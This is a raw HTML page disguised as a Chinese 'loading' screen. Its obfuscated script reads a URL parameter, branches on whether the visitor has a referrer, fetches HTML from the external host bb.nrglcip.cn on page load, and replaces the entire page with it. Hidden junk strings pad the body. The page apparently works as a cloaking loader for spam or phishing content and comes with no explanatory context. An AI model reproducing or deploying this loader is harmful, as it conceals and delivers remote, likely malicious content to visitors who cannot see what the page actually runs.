<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cAER5K14Um {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cAER5K14Um .Cmu1fs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cAER5K14Um .content {
            line-height: 50px;
            text-align: center
        }

        .cAER5K14Um .img {
            width: 100%
        }

        .cAER5K14Um .OdQWP6 {
            text-align: center
        }

        .cAER5K14Um .OdQWP6 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cAER5K14Um .OdQWP6 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cAER5K14Um .OdQWP6 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cAER5K14Um .OdQWP6 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cAER5K14Um .OdQWP6 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cAER5K14Um .OdQWP6 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cAER5K14Um .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RL4qy6BQuNz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Do3Qyq = RL4qy6BQuNz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Do3Qyq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Do3Qyq +".html?a=share";
		}
		
        hqjQyfwYl=url+"#"+new Date().getTime();
        hqjQyfwYl && function() {
            $.get(hqjQyfwYl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>TrmrCYpWovHrGFhZ</p>
<ul style='display:none' >T8UDLXJ7NVxWslc1SeNAZOTuyVQIpoqP8IE3grhU4NOGrYBAEBDOW7PPSzmsWmXzcCsINFLgI1bGlp</ul>
<span style='display:none'>lbp2uF240afeoGxWxKVQganQMFRZc6xbhJMXCU90Zi3dqexpFUGZBaCRY5QpzPV</span>
<div style='display:none'>UDlvv3s8cimBzNdOP9212S1mAkTOhYXEnKBgrNwxZKt7fOiA29z2NY8lAUZFr6J0m6KSScV6CBDV0FbpRsyZb</div>
<a  href='#' style='display:none'>PtfEWjcFZSxBaxmBOcRJvNcGV2B2qzmDbwxCaWDTjBP0gyVIjIcM5Nz</a>
<p  style='display:none'>TrmrCYpWovHrGFhZ</p><div class="cAER5K14Um">
    <div class="Cmu1fs">
        <div class="OdQWP6">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>dA99FIMDB8CMb9gIXjTd3uKLU57VPa0</p>
<ul style='display:none' >DanrAKw98WAMZnVlpMYgG5bkPzfeprbLsj0AXcMhTaSKELlimmCcAFh3V3aW2oxC44yMbu</ul>
<b style='display:none' >YJ8e3H3UvgdGR1uy9zvBChKv5d69Zosv1E1ZKm6FXOJX04vwannpKc2sqgbT7lOpX1C9eD9zSjiv44295OBhlN08bLm2tu</b>
<p  style='display:none'>dA99FIMDB8CMb9gIXjTd3uKLU57VPa0</p>
<p  style='display:none'>dA99FIMDB8CMb9gIXjTd3uKLU57VPa0</p>
<div style='display:none'>zDR4Tf68kbsoWKEhltcbhwIneewxhBrVeykb0CXtxlcsogmNsj4EUDn</div></body>
</html>